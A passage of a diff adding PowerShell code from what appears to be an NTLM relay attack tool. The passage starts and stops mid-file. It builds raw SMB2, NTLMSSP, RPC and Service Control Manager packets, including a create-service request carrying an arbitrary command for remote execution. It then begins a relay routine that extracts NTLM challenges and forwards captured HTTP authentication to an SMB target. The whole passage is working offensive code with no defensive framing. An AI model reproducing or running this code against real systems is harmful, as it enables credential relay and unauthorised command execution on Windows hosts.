+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+ }
+
+ function New-PacketSMB2SessionSetupRequest
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+ }
+
+ function New-PacketSMB2TreeConnectRequest
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+ }
+
+ function New-PacketSMB2CreateRequestFile
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+
+ $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequestFile.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequestFile.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequestFile.Add("NameLength",$packet_named_pipe_length)
+ $packet_SMB2CreateRequestFile.Add("CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("Buffer",$packet_named_pipe)
+
+ return $packet_SMB2CreateRequestFile
+ }
+
+ function New-PacketSMB2ReadRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $packet_SMB2ReadRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+ }
+
+ function New-PacketSMB2WriteRequest
+ {
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("Length",$packet_write_length)
+ $packet_SMB2WriteRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2WriteRequest
+ }
+
+ function New-PacketSMB2CloseRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+ }
+
+ function New-PacketSMB2TreeDisconnectRequest
+ {
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+ }
+
+ function New-PacketSMB2SessionLogoffRequest
+ {
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+ }
+
+ #NTLM
+
+ function New-PacketNTLMSSPNegotiate
+ {
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("InitialContextTokenID",[Byte[]](0x60))
+ $packet_NTLMSSPNegotiate.Add("InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+ }
+
+ function New-PacketNTLMSSPAuth
+ {
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+ }
+
+ #RPC
+
+ function New-PacketRPCBind
+ {
+ param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
+
+ [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
+
+ $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCBind.Add("Version",[Byte[]](0x05))
+ $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCBind.Add("PacketType",[Byte[]](0x0b))
+ $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03))
+ $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00))
+ $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("CallID",$packet_call_ID_bytes)
+ $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items)
+ $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID",$packet_context_ID)
+ $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown2",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface",$packet_UUID)
+ $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version)
+ $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($packet_num_ctx_items[0] -eq 2)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($packet_num_ctx_items[0] -eq 3)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00))
+ $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown4",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ if($packet_call_ID -eq 3)
+ {
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $packet_RPCBind
+ }
+
+ function New-PacketRPCRequest
+ {
+ param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
+
+ if($packet_auth_length -gt 0)
+ {
+ $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
+ }
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
+ [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
+ $packet_auth_length = $packet_auth_length[0,1]
+
+ $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCRequest.Add("Version",[Byte[]](0x05))
+ $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketType",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketFlags",$packet_flags)
+ $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCRequest.Add("FragLength",$packet_frag_length)
+ $packet_RPCRequest.Add("AuthLength",$packet_auth_length)
+ $packet_RPCRequest.Add("CallID",$packet_call_ID)
+ $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint)
+ $packet_RPCRequest.Add("ContextID",$packet_context_ID)
+ $packet_RPCRequest.Add("Opnum",$packet_opnum)
+
+ if($packet_data.Length)
+ {
+ $packet_RPCRequest.Add("Data",$packet_data)
+ }
+
+ return $packet_RPCRequest
+ }
+
+ #SCM
+
+ function New-PacketSCMOpenSCManagerW
+ {
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+ }
+
+ function New-PacketSCMCreateServiceW
+ {
+ param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
+ [Byte[]]$packet_command,[Byte[]]$packet_command_length)
+
+ $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID += 0x00,0x00
+
+ $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMCreateServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMCreateServiceW.Add("ServiceName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName",$packet_service)
+ $packet_SCMCreateServiceW.Add("DisplayName_ReferentID",$packet_referent_ID)
+ $packet_SCMCreateServiceW.Add("DisplayName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DisplayName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName",$packet_service)
+ $packet_SCMCreateServiceW.Add("AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_MaxCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_ActualCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName",$packet_command)
+ $packet_SCMCreateServiceW.Add("NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SCMCreateServiceW
+ }
+
+ function New-PacketSCMStartServiceW
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMStartServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMStartServiceW.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SCMStartServiceW
+ }
+
+ function New-PacketSCMDeleteServiceW
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMDeleteServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCMDeleteServiceW
+ }
+
+ function New-PacketSCMCloseServiceHandle
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCM_CloseServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCM_CloseServiceW
+ }
+
+}
+
+# Relay Functions ScriptBlock
+$SMB_relay_functions_scriptblock =
+{
+
+ function SMBNTLMChallenge
+ {
+ param ([Byte[]]$payload_bytes)
+
+ $payload = [System.BitConverter]::ToString($payload_bytes)
+ $payload = $payload -replace "-",""
+ $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+
+ if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+ {
+ $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+ }
+
+ return $NTLM_challenge
+ }
+
+ function SMBRelayChallenge
+ {
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check)
+
+ if($SMB_relay_socket)
+ {
+ $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
+ }
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
+ $SMB_client_stage = 'NegotiateSMB'
+
+ :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
